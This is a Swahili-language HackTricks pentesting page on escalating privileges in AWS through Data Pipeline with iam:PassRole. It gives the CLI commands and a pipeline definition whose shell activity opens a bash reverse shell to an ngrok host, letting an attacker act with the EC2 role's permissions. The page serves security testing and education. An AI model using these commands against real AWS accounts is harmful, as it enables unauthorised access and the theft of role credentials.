AWS - Datapipeline Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

datapipeline

Kwa habari zaidi kuhusu datapipeline angalia:

pageAWS - DataPipeline, CodePipeline & CodeCommit Enum

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

Watumiaji wenye ruhusa hizi wanaweza kupandisha mamlaka kwa kuunda Data Pipeline kutekeleza amri za kupindukia kutumia ruhusa za jukumu lililopewa:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Baada ya uundaji wa mabomba, mshambuliaji anasasisha ufafanuzi wake ili kuamuru hatua maalum au uundaji wa rasilimali:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Tafadhali kumbuka kuwa jukumu katika mstari wa 14, 15 na 27 inahitaji kuwa jukumu linaloweza kuchukuliwa na datapipeline.amazonaws.com na jukumu katika mstari wa 28 inahitaji kuwa jukumu linaloweza kuchukuliwa na ec2.amazonaws.com na EC2 profile instance.

Zaidi ya hayo, kifaa cha EC2 kitakuwa na ufikiaji tu kwa jukumu linaloweza kuchukuliwa na kifaa cha EC2 (hivyo unaweza kuiba hicho tu).

```bash aws datapipeline put-pipeline-definition --pipeline-id \ --pipeline-definition file:///pipeline/definition.json ``` **Faili la ufafanuzi wa mabomba, lililoundwa na mshambuliaji, lina maagizo ya kutekeleza amri** au kuunda rasilimali kupitia AWS API, ikichangamsha ruhusa za jukumu la Data Pipeline ili kupata uwezekano wa kupata mamlaka zaidi.

Athari Inayowezekana: Privesc moja kwa moja kwa jukumu la huduma ya ec2 iliyotajwa.

Marejeo

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - Cognito Privesc NextAWS - Directory Services Privesc

Last updated 2 months ago

datapipeline

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Marejeo

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`